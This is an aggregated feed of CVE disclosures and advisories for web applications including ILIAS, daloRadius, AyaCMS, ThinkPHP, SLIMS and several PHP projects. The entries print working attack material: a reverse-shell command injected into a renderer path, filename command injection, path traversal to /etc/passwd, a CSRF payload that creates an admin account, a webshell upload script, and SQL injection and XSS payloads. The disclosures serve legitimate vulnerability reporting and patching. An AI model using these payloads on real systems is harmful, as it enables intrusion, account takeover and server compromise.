Rapid Software LLC Rapid SCADA 5.8.4 is vulnerable to Cross Site Scripting (XSS).

**Исследования**

Ежедневное исследование Казнета и новых способов взлома и защиты информационных систем - ответственная миссия команды NitroTeam.

Мы глубоко озабочены состоянием Информационной Безопасности в Казахстане и делимся своими наработками здесь на сайте и в социальных сетях.

 06.12.2022 0  84

**\[CVE-2022-44153\] XSS уязвимость в Rapid SCADA 5.8.4**

WEB

Наш исследователь @claunch3r обнаружил XSS уязвимость в програмном обеспечении Rapid SCADA 5.8.4

 02.06.2022 0  5166

**Множественные уязвимости в LibreHealth part 2**

WEB

Во время стажировки в нашей компании, студенты нашли множественные уязвимости в LibreHealth: Broken Access Control (CVE-2022-31496), Cross-Site Scripting (CVE-2022-31492, CVE-2022-31493, CVE-2022-31494, CVE-2022-31495, CVE-2022-31497, CVE-2022-31498).

 04.05.2022 0  9060

**Описание уязвимостей CVE-2022-29938, CVE-2022-29939, CVE-2022-29940 в LibreHealth**

WEB

Наш исследователь нашел в LibreHealth EHR 2.0.0 множественные уязвимости, а именно 1 SQL-injection (CVE-2022-29938) и 2 Cross-site scripting (XSS) (CVE-2022-29939, CVE-2022-29940)

 15.02.2021 0  8018

**Описание CVE-2020-29139, CVE-2020-29140, CVE-2020-29142, CVE-2020-29143 в OpenEMR 6.0.0-dev, OpenEMR 5.0.2(5)**

WEB

В ходе исследования движка для медицинских организаций OpenEMR с открытым исходным кодом были обнаружены 4 уязвимости типа SQL-инъекция. Тестирование уязвимостей производилось на Windows 10, Apache 2.4, 10.3.22-MariaDB. PHP 7.1.33 для OpenEMR 5.0.2(5) и PHP 7.4 для OpenEMR 6.0.0-dev. Настоятельно рекомендуем обновиться до последней версии продукта.

CVE-2022-44153: Nitro Team Researches

Online Leave Management System v1.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the component /leave_system/admin/?page=maintenance/department. This vulnerability allows attackers to execute arbitrary web scripts or HTML via crafted payload injected into the Name field under the Create New module.

Permalink

**Online Leave Management System v1.0 by oretnom23 has Stored Cross Site Scripting**

BUG\_Author: realguoxiufeng

vendors:https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

**Steps to reproduce**

Navigate to Department List "/leave\_system/admin/?page=maintenance/department" and Click "Create New"

Paste the below payload on Name fields and click save

    ab<script>alert(document.cookie)</script>cd
    

Transmission packet

    POST /leave_system/classes/Master.php?f=save_department HTTP/1.1
    Host: localhost
    Content-Length: 371
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    Accept: application/json, text/javascript, */*; q=0.01
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQoouFFx1OqtN678U
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Origin: http://localhost
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost/leave_system/admin/?page=maintenance/department
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=reimqvb6otjde4joflmctma8a6
    Connection: close
    
    ------WebKitFormBoundaryQoouFFx1OqtN678U
    Content-Disposition: form-data; name="id"
    
    
    ------WebKitFormBoundaryQoouFFx1OqtN678U
    Content-Disposition: form-data; name="name"
    
    ab<script>alert(document.cookie)</script>cd
    ------WebKitFormBoundaryQoouFFx1OqtN678U
    Content-Disposition: form-data; name="description"
    
    abcdef
    ------WebKitFormBoundaryQoouFFx1OqtN678U--
    

Payload will trigger when a user visits on /leave\_system/admin/?page=maintenance/department

CVE-2022-45008: bug_report/XSS-1.md at main · realguoxiufeng/bug_report

ILIAS before 7.16 allows External Control of File Name or Path.

ILIAS is a common eLearning platform, published under an open source license. Version 7.14 is vulnerable to multiple critical vulnerabilities, ranging from XSS over LFI to command injection.

**Vendor description**

_"Around since 1998, ILIAS is a powerful learning management system that fulfills all your requirements. Using its integrated tools, small and large businesses, universities, schools and public authorities are able to create tailored, individual learning scenarios."_

Source: https://www.ilias.de/en/

**  
Business recommendation**

The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues.

**Vulnerability overview/description****1) Authenticated Direct OS Command Injection - CVE-2022-45915**

ILIAS utilizes several third-party programs to perform tasks like creating PDF files or scanning uploaded files for known viruses. These are called using the PHP exec() function. In several instances, the arguments passed to the exec() function contain user input that is not properly sanitized.

By performing malicious configuration steps or uploading dangerous files, an attacker can execute arbitrary system commands with the rights of the web server user (www-data). The privilege required for the different instances of command injection range from low rights to admin rights.

**2) Stored Cross-Site Scripting - CVE-2022-45916**

Multiple stored cross-site scripting vulnerabilities were identified in ILIAS course items. These were either achieved by bypassing existing XSS filters or simply by exploiting missing input validation altogether. This results in the execution of attacker-controlled JavaScript code by the user's browser.

The attacker requires the right to create course items, e.g., as a tutor of a course.

**  
3) Local File Inclusion - CVE-2022-45918**

The included SCORM editor features a debugger that gives authors insights into the current SCORM player session, as well as previous sessions. When accessing the logs of previous sessions, the debugger fails to validate the requested file path, allowing for arbitrary filesystem access.

**  
4) Open Redirect - CVE-2022-45917**

The function shib\_logout.php redirects the user to a URL specified in the "return" parameter. Since this parameter is not validated, an attacker can use it to redirect a victim to an arbitrary website. This is a powerful tool in phishing campaigns, as it allows hiding the malicious webpage behind a link that looks like it would take you to the real ILIAS webpage.

**Proof of concept****1) Authenticated Direct OS Command Injection - CVE-2022-45915**

Multiple instances of command injection vulnerabilities were identified:

****a) ZIP archive upload****

Normal users with open assessments can submit their solution by uploading a ZIP archive. These archives are extracted on the server and scanned for viruses recursively. The directory and file names can be used by an attacker to inject system commands, e.g., by including a directory with the name $(touch /tmp/pwned) to the ZIP archive. Exploiting this vulnerability, an attacker is able to get a reverse shell on the ILIAS webserver with the rights of the web server user (www-data).

****b) Media object creation****

ILIAS can be configured so that users can create media objects based on files inside an "Upload Directory". Before these objects are created, the files are scanned for viruses. The file names can be used by an attacker to inject system commands. By placing a file with a name like $(touch /tmp/pwned) inside the upload directory and then creating a media object based on it, an attacker is able to execute arbitrary system commands with the rights of www-data on the server.

****c) PDF document creation****

ILIAS provides users the functionality to export content as PDF files. A user with admin rights can configure the path to the preferred PDF renderer. An attacker can use this parameter to inject system commands. Due to missing input validation it is possible to inject multiple commands. The path to wkhtmltopdf has to be included in the payload, as ILIAS checks for it. By changing the path to:

    /usr/local/bin/wkhtmltopdf; bash -c "bash -i >& /dev/tcp/<IP_Address_Attacker>/13373 0>&1";

an attacker can open a reverse shell with the rights of www-data that connects to the attacker's machine on port 13373. The reverse shell is initiated when the export function is triggered. No PDF renderer has to be installed for this vulnerability to be exploitable.

**2) Stored Cross-Site Scripting - CVE-2022-45916**

Multiple instances of stored cross-site scripting were identified:

****a) Several Stored XSS Attacks in Tests****

An attacker must be able to create new tests in which the JavaScript code will be embedded. If a victim then later accesses one of those tests, the XSS payload will be triggered. The "Question" input field of a test has a filter in place, which correctly removes HTML tags such as <script> or <img src="x" onerror="alert(document.cookie)">. By making use of half open HTML tags, this filter can be successfully bypassed. E.g.

    <img src="x" onerror="alert(document.cookie)"

This half open HTML tag can also be used in the "Introductory Message" of a test to trigger an XSS. It's important to end the JavaScript code with a quotation mark or space, to properly separate it from successive HTML tags, after it's embedded into a test. Finally, the "Question" input field of the question type "Long Menu" was identified to use no filtering at all, resulting in the unrestricted use of arbitrary HTML tags such as <script>.

**  
**b) Stored XSS in title of course items****

An attacker with rights to create an arbitrary course item can conduct a stored XSS attack by setting the title of the element to:

    " onclick="alert(document.cookie)"

When a user clicks on the button to the right of the title, the XSS payload is triggered.

****c) Stored XSS in HTML sites****

An attacker with rights to edit an HTML Learning Module can conduct a stored XSS attack, as it is allowed to insert JavaScript Code to the HTML page. Even if this behavior is intended, it is insecure and considered bad practice.

**  
**3) Local File Inclusion - CVE-2022-45918****

As a prerequisite, the SCORM debugger must be enabled for the whole ILIAS platform. An attacker with access to a SCORM player can open the SCORM debugger and request the logs of a previous session. By changing the value of the "logFile" query parameter of the request, they can read arbitrary files of the server's filesystem. For example, to read the passwd file on Linux systems, an attacker can change the value of the parameter logfile to

    "../../../../../../../../../etc/passwd"

****4) Open Redirect - CVE-2022-45917****

The shib\_logout function is vulnerable to an open redirect. A URL that successfully uses this vulnerability to redirect to "https://www.sec-consult.com" is:

    http:// ILIAS-URL/shib_logout.php?action=logout&return=https://www.sec-consult.com

**Vulnerable / tested versions**

The vulnerabilities were identified in ILIAS version 7.14.

However, a brief analysis of the source code suggests, that several vulnerabilities are present in versions dating back to at least 3.8.4. Hence it is assumed that most current versions of the product are affected. The vulnerabilities were partly fixed in version 7.15, a complete patch is available with version 7.16.

**Vendor contact timeline**

CVE-2022-45918: Multiple critical vulnerabilities in ILIAS eLearning platform

daloRADIUS is an open source RADIUS web management application. daloRadius 1.3 and prior are vulnerable to a combination cross site scripting (XSS) and cross site request forgery (CSRF) vulnerability which leads to account takeover in the mng-del.php file because of an unescaped variable reflected in the DOM on line 116. This issue has been addressed in commit `ec3b4a419e`. Users are advised to manually apply the commit in order to mitigate this issue. Users may also mitigate this issue with in two parts 1) The CSRF vulnerability can be mitigated by making the daloRadius session cookie to samesite=Lax or by the implimentation of a CSRF token in all forms. 2) The XSS vulnerability may be mitigated by escaping it or by introducing a Content-Security policy.

**Platform** : daloRadius

**Repository** : daloRadius github

**Vulnerability** : XSS+CSRF to create a new _admin/operator_ account

****Description****

daloRadius 1.3 was vulnerable to XXS+CSRF to account takeover in the mng-del.php file because of an unescaped variable reflected in the DOM on line 116. I reported this vulnerability last week to all the maintainers of this repository and it was later found out by @filippolauria, the maintainer of this repository that this bug is not only found in line 116 but on a lot of other parts in the code, thanks to him for the quick and amazing patches.

****Steps to Reproduce****

1.  The vulnerabilitiy lies in the /mng-del.php file
2.  we can send a request like the following http://<domain>/mng-del.php?username[]=a&username[]=%3C%2Ftd%3E%3Cimg+src+onerror%3D%22alert(document.domain)%22%3E  to pop a simple alert box.
3.  You can use the following payload to create a new operator account
4.  There are multiple forms which are vulnerable to CSRF

    Payload: http://<domain>/mng-del.php?username[]=a&username[]=%3C%2Ftd%3E%3Cimg%20src%20onerror%3D%22fetch(%27http%3A%2F%2F<domain>%2Fconfig-operators-new.php%27%2C%7Bmethod%3A%27POST%27%2Cheaders%3A%7B%27Content-Type%27%3A%20%27application%2Fx-www-form-urlencoded%27%2C%7D%2Cbody%3A%27operator_username%3Dhacked%26operator_password%3Dhacked%26submit%3DApply%26firstname%3D%26lastname%3D%26title%3D%26department%3D%26company%3D%26phone1%3D%26phone2%3D%26email1%3D%26email2%3D%26messenger1%3D%26messenger2%3D%26notes%3D%26ACL_acct_custom_query%3D1%26ACL_acct_all%3D1%26ACL_acct_username%3D1%26ACL_acct_nasipaddress%3D1%26ACL_acct_active%3D1%26ACL_acct_ipaddress%3D1%26ACL_acct_date%3D1%26ACL_acct_hotspot_compare%3D1%26ACL_acct_hotspot_accounting%3D1%26ACL_acct_maintenance_delete%3D1%26ACL_acct_maintenance_cleanup%3D1%26ACL_acct_plans_usage%3D1%26ACL_bill_history_query%3D1%26ACL_bill_invoice_new%3D1%26ACL_bill_invoice_del%3D1%26ACL_bill_invoice_report%3D1%26ACL_bill_invoice_list%3D1%26ACL_bill_invoice_edit%3D1%26ACL_bill_merchant_transactions%3D1%26ACL_bill_payment_types_edit%3D1%26ACL_bill_payment_types_del%3D1%26ACL_bill_payment_types_new%3D1%26ACL_bill_payment_types_list%3D1%26ACL_bill_payments_list%3D1%26ACL_bill_payments_new%3D1%26ACL_bill_payments_edit%3D1%26ACL_bill_payments_del%3D1%26ACL_bill_plans_del%3D1%26ACL_bill_plans_new%3D1%26ACL_bill_plans_list%3D1%26ACL_bill_plans_edit%3D1%26ACL_bill_pos_list%3D1%26ACL_bill_pos_edit%3D1%26ACL_bill_pos_del%3D1%26ACL_bill_pos_new%3D1%26ACL_bill_rates_new%3D1%26ACL_bill_rates_del%3D1%26ACL_bill_rates_date%3D1%26ACL_bill_rates_list%3D1%26ACL_bill_rates_edit%3D1%26ACL_config_backup_managebackups%3D1%26ACL_config_backup_createbackups%3D1%26ACL_config_interface%3D1%26ACL_config_user%3D1%26ACL_config_lang%3D1%26ACL_config_logging%3D1%26ACL_graphs_overall_upload%3D1%26ACL_graphs_overall_download%3D1%26ACL_graphs_alltime_traffic_compare%3D1%26ACL_mng_rad_attributes_list%3D1%26ACL_mng_rad_attributes_del%3D1%26ACL_mng_rad_attributes_search%3D1%26ACL_mng_rad_attributes_import%3D1%26ACL_mng_rad_attributes_edit%3D1%26ACL_mng_rad_attributes_new%3D1%26ACL_mng_batch_add%3D1%26ACL_mng_batch_del%3D1%26ACL_mng_batch_list%3D1%26ACL_mng_rad_groupreply_search%3D1%26ACL_mng_rad_groupreply_edit%3D1%26ACL_mng_rad_groupcheck_list%3D1%26ACL_mng_rad_groupreply_del%3D1%26ACL_mng_rad_groupcheck_del%3D1%26ACL_mng_rad_groupcheck_new%3D1%26ACL_mng_rad_groupreply_list%3D1%26ACL_mng_rad_groupcheck_search%3D1%26ACL_mng_rad_groupcheck_edit%3D1%26ACL_mng_rad_groupreply_new%3D1%26ACL_mng_hs_edit%3D1%26ACL_mng_hs_del%3D1%26ACL_mng_hs_list%3D1%26ACL_mng_hs_new%3D1%26ACL_mng_rad_hunt_edit%3D1%26ACL_mng_rad_hunt_new%3D1%26ACL_mng_rad_hunt_del%3D1%26ACL_mng_rad_hunt_list%3D1%26ACL_mng_rad_ippool_new%3D1%26ACL_mng_rad_ippool_list%3D1%26ACL_mng_rad_ippool_del%3D1%26ACL_mng_rad_ippool_edit%3D1%26ACL_mng_rad_nas_edit%3D1%26ACL_mng_rad_nas_del%3D1%26ACL_mng_rad_nas_list%3D1%26ACL_mng_rad_nas_new%3D1%26ACL_mng_rad_profiles_duplicate%3D1%26ACL_mng_rad_profiles_edit%3D1%26ACL_mng_rad_profiles_new%3D1%26ACL_mng_rad_profiles_list%3D1%26ACL_mng_rad_profiles_del%3D1%26ACL_mng_rad_proxys_new%3D1%26ACL_mng_rad_proxys_list%3D1%26ACL_mng_rad_proxys_del%3D1%26ACL_mng_rad_proxys_edit%3D1%26ACL_mng_rad_realms_new%3D1%26ACL_mng_rad_realms_list%3D1%26ACL_mng_rad_realms_del%3D1%26ACL_mng_rad_realms_edit%3D1%26ACL_mng_rad_usergroup_edit%3D1%26ACL_mng_rad_usergroup_del%3D1%26ACL_mng_rad_usergroup_list%3D1%26ACL_mng_rad_usergroup_list_user%3D1%26ACL_mng_rad_usergroup_new%3D1%26ACL_mng_new%3D1%26ACL_mng_batch%3D1%26ACL_mng_new_quick%3D1%26ACL_mng_del%3D1%26ACL_mng_import_users%3D1%26ACL_mng_edit%3D1%26ACL_mng_list_all%3D1%26ACL_mng_search%3D1%26ACL_rep_newusers%3D1%26ACL_rep_lastconnect%3D1%26ACL_rep_history%3D1%26ACL_rep_online%3D1%26ACL_rep_topusers%3D1%26ACL_rep_logs_radius%3D1%26ACL_rep_logs_system%3D1%26ACL_rep_logs_boot%3D1%26ACL_rep_logs_daloradius%3D1%26ACL_rep_stat_server%3D1%26ACL_rep_stat_raid%3D1%26ACL_rep_stat_services%3D1%26ACL_rep_stat_ups%3D1%26ACL_rep_stat_cron%3D1%27%2C%7D).then(r%3D%3Er.text()).then(r%3D%3Ealert(r))%22%3E
    

****Severity****

daloRadius is used by a number of organizations for managing Hotspots and general-purpose ISP deployments. An attacker can create an admin/operator account using one click and take over the network of the organization. An attacker will be able to create new user accounts and delete existing ones and change network configurations.

****Mitigation****

1.  The CSRF vulnerability can be mitigated by making the daloRadius session cookie to samesite=Lax or by the implimentation of a CSRF token in all forms
2.  We can prevent the XSS by escaping it or by introducing a Content-Security policy

CVE-2022-23475: dalorRadius XXS+CSRF to Full Account Take over

AutoTaxi Stand Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component search.php.

**Auto/Taxi Stand Management System using PHP and MySQL**

“Auto/Taxi Stand Management System” is a web-based technology that will manage the records of the incoming and outgoing autos and taxis in a parking stand. It’s an easy for Admin to retrieve the data if the auto and taxi has been visited through the number he can get that data“Auto/Taxi Stand Management Project in PHP”  is an automatic system that delivers data processing in very high speed in a systematic manner.

**Project Requirements**

Project Name

Auto/Taxi Stand Management System Project (Using PHP & MYSQLi)

Language Used

PHP5.6, PHP7.x

Database

MySQL 5.x

User Interface Design

HTML, AJAX,JQUERY,JAVASCRIPT

Web Browser

Mozilla, Google Chrome, IE8, OPERA

Software

XAMPP / Wamp / Mamp/ Lamp (anyone)

**Project Modules**

In “Auto/Taxi Stand Management System project”  we use PHP and MySQL database. This is the project which keeps records of the auto and taxi which is going to park in the stand. “Auto/Taxi Stand Management System”  have module i.e., admin and user.

**User**

User can only view the Auto/Taxi stand recipient by using their name and mobile number. number.

**Admin**

**Dashboard**: In this sections, the admin can briefly view the number of auto and taxi entries in a particular period.

**New Auto/Taxi Entry**: In this section, admin add auto and taxi which is going into the stand.

**Manage Auto/Taxi Entry**: In this section, admin can manage incoming and outgoing auto and taxi and the admin can also add parking charges and his/her remarks.

**Reports**: In this section admin can generate auto and taxi entry reports between two dates.

Admin can also update his profile, change the password and recover the password.

****Some of the Project Screens****

**Admin Login**

**Admin Dashboard**

**Auto/Taxi Stand Entry Form**

**Auto/Taxi Stand Receipt**

**How to run the Auto/Taxi Stand Management System Project Using PHP and M**ySQL****

1\. Download the zip file

2\. Extract the file and copy atsms  folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/HTML)

4.Open PHPMyAdmin (http://localhost/phpmyadmin)

5\. Create a database with the name atsmsdb

6\. Import atsmsdb.sql file(given inside the zip package in the SQL file folder)

7\. Run the script http://localhost/atsms

**Credential for admin panel :**  
Username: admin  
Password: Test@123

**View Demo**

**Download Project Source Code**

**Project Report**

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

CVE-2022-43369: Auto/Taxi Stand Management System Project in PHP | Auto Stand Management Project

AyaCMS v3.1.2 has an Arbitrary File Upload vulnerability.

Register a frontend user and login to get the cookie, then upload our webshell.

    import requests
    
    files = {
        'Filedata': ('shell.php', '<?php @eval($_POST[2333]);')
    }
    cookies = {
        'aya_auth': 'UmMGDhI2GypYeUw1XApRO1dkEiEFN1UwTCcGOhZxVjxbOwRhCWwTf0ErTSNJLl9mRCMQcAMzXjlBLgY7DGtFKFJnBjcSJBt2WGlMc1w3',
        'aya_template': 'pc'
    }
    url = 'http://localhost/AyaCMS/ajax.php?fun=upload_file'
    r = requests.post(url=url, files=files, cookies=cookies)
    print(r.text)
    

We will get a webshell.

CVE-2022-45548: AyaCMS v3.1.2 has a Frontend Arbitrary File Upload Vulnerability  · Issue #4 · loadream/AyaCMS

Thinkphp 5.1.41 and 5.0.24 has a code logic error which causes file upload getshell.

**Thinkphp has a code logic error**

Moderate severity GitHub Reviewed Published Dec 6, 2022 • Updated Dec 6, 2022

GHSA-59fh-rjq3-xq7j: Thinkphp has a code logic error

**Code logic error causes file upload getshell**  
Verify version:Thinkphp5.1.41/Thinkphp5.0.24  
Install:composer create-project topthink/think tp 5.xxx

test version:Thinkphp5.1.41  
If the user directly uses the move method of thinkphp  
like this：Add an upload controller like the official documentation:https://www.kancloud.cn/manual/thinkphp5\_1/354121

<?php
namespace app\\index\\controller;

class Upload 
{
    public function index(){
        // 获取表单上传文件 例如上传了001.jpg
        $file = request()->file('image');
        // 移动到框架网站目录/uploads/ 目录下
        $info = $file\->move( './uploads');
        if($info){
            // 成功上传后 获取上传信息
            // 输出 jpg
            echo $info\->getExtension();
            // 输出 20160820/42a79759f284b767dfcb2a0197904287.jpg
            echo $info\->getSaveName();
            // 输出 42a79759f284b767dfcb2a0197904287.jpg
            echo $info\->getFilename(); 
        }else{
            // 上传失败获取错误信息
            echo $file\->getError();
        }
    }

}

Will cause the file with the suffix php to be uploaded directly  
Because in thinkphp\library\think\File.php line 272 it is allowed

public function checkImg()
    {
        $extension = strtolower(pathinfo($this\->getInfo('name'), PATHINFO\_EXTENSION));

        /\* 对图像文件进行严格检测 \*/
        if (in\_array($extension, \['gif', 'jpg', 'jpeg', 'bmp', 'png', 'swf'\]) && !in\_array($this\->getImageType($this\->filename), \[1, 2, 3, 4, 6, 13\])) {
            $this\->error = 'illegal image files';
            return false;
        }

        return true;
    }

I think the problem is that true and false are written in reverse. And !in\_array getImageType

The logic should be?

public function checkImg()
    {
        $extension = strtolower(pathinfo($this\->getInfo('name'), PATHINFO\_EXTENSION));

        /\* 对图像文件进行严格检测 \*/
        if (in\_array($extension, \['gif', 'jpg', 'jpeg', 'bmp', 'png', 'swf'\]) && in\_array($this\->getImageType($this\->filename), \[1, 2, 3, 4, 6, 13\])) {
            return true;
        }

        return false;
    }

CVE-2022-44289: Code logic error causes file upload getshell · Issue #2772 · top-think/framework

Senayan Library Management System version 9.5.1 suffers from a remote SQL injection vulnerability.

## Title: Senayan Library Management System v9.5.1 a.k.a SLIMS 9 SQLi## Author: nu11secur1ty## Date: 12.06.2022## Vendor: https://slims.web.id/web/## Software: https://slims.web.id/web/news/rilis-9.5.1/## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.1## Description:The manual insertion `point 4` appears to be vulnerable to SQLinjection attacks.The payload '+(selectload_file('\\\\mmceb8f9w8n0s3mutza4ttmxzo5it8hzknbdy6mv.again.com\\ejf'))+'was submitted in the manual insertion `point 4` testing.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The application interacted with that domain, indicating that theinjected SQL query was executed.The attacker can execute a very dangerous `subquery` to view verysensitive information.## STATUS: HIGH Vulnerability[+] Payload:```MySQLGET /slims9_bulian-9.5.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=bbbb%27%2b(select*from(select(sleep(5)))a)%2b%27&membershipType=a&collType=aaaaHTTP/1.1Host: pwnedhost.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=tc5upjgvv2j3mid2ur5tdmmpje; admin_logged_in=1;SenayanMember=schm4nbtgbb5i1tbeonr6cav3uConnection: close```[+] Response:```MySQLHTTP/1.1 200 OKDate: Tue, 06 Dec 2022 13:51:38 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Frame-Options: SAMEORIGINX-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockContent-Length: 4120Connection: closeContent-Type: text/html; charset=UTF-8<!doctype html><html><head><title>Loan Report by Class Report</title>    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>    <meta http-equiv="Pragma" content="no-cache"/>    <meta http-equiv="Cache-Control" content="no-store, no-cache,must-revalidate, post-check=0, pre-check=0"/>    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>    <link rel="stylesheet" type="text/css"href="/slims9_bulian-9.5.1/css/bootstrap.min.css"/>    <link rel="stylesheet" type="text/css"href="/slims9_bulian-9.5.1/admin/admin_template/default/style.css?31085233"/>    <script type="text/javascript"src="/slims9_bulian-9.5.1/js/jquery.js"></script>    <script type="text/javascript"src="/slims9_bulian-9.5.1/js/gui.js"></script></head><body><div id="pageContent">  <div class="mb-2">Loan Recap By Class<strong>bbbb'+(select*from(select(sleep(5)))a)+'</strong> for year<strong>2002</strong> <a class="s-btn btn btn-default printReport"onclick="window.print()" href="#">Print Current Page</a><ahref="../xlsoutput.php" class="s-btn btn btn-default"target="_BLANK">Export to spreadsheet format</a>    <a class="s-btn btn btn-info notAJAX openPopUp"href="/slims9_bulian-9.5.1/admin/modules/reporting/pop_chart.php"width="700" height="530" title="Loan Recap By Class">Show inchart/plot</a></div><table class="s-table table table-sm table-bordered"><tr><thclass="dataListHeaderPrinted">Classification</th><thclass="dataListHeaderPrinted">Jan</th><thclass="dataListHeaderPrinted">Feb</th><thclass="dataListHeaderPrinted">Mar</th><thclass="dataListHeaderPrinted">Apr</th><thclass="dataListHeaderPrinted">May</th><thclass="dataListHeaderPrinted">Jun</th><thclass="dataListHeaderPrinted">Jul</th><thclass="dataListHeaderPrinted">Aug</th><thclass="dataListHeaderPrinted">Sep</th><thclass="dataListHeaderPrinted">Oct</th><thclass="dataListHeaderPrinted">Nov</th><thclass="dataListHeaderPrinted">Dec</th></tr><tr><td><strong>bbbb'+(select*from(select(sleep(5)))a)+'00</strong></td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'00</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'10</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'20</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'30</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'40</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'50</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'60</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'70</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'80</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'90</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td></table></div><div class="loader"></div><script type="text/javascript">    // if we are inside iframe    jQuery(document).ready(function () {          });</script></body></html>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.1)## Proof and Exploit:[href](https://streamable.com/gthu91)## Time spent`04:00:00`

Senayan Library Management System 9.5.1 SQL Injection

The web-management application on Seagate Central NAS STCG2000300, STCG3000300, and STCG4000300 devices allows OS command injection via mv_backend_launch in cirrus/application/helpers/mv_backend_helper.php by leveraging the "start" state and sending a check_device_name request.

Tag

#php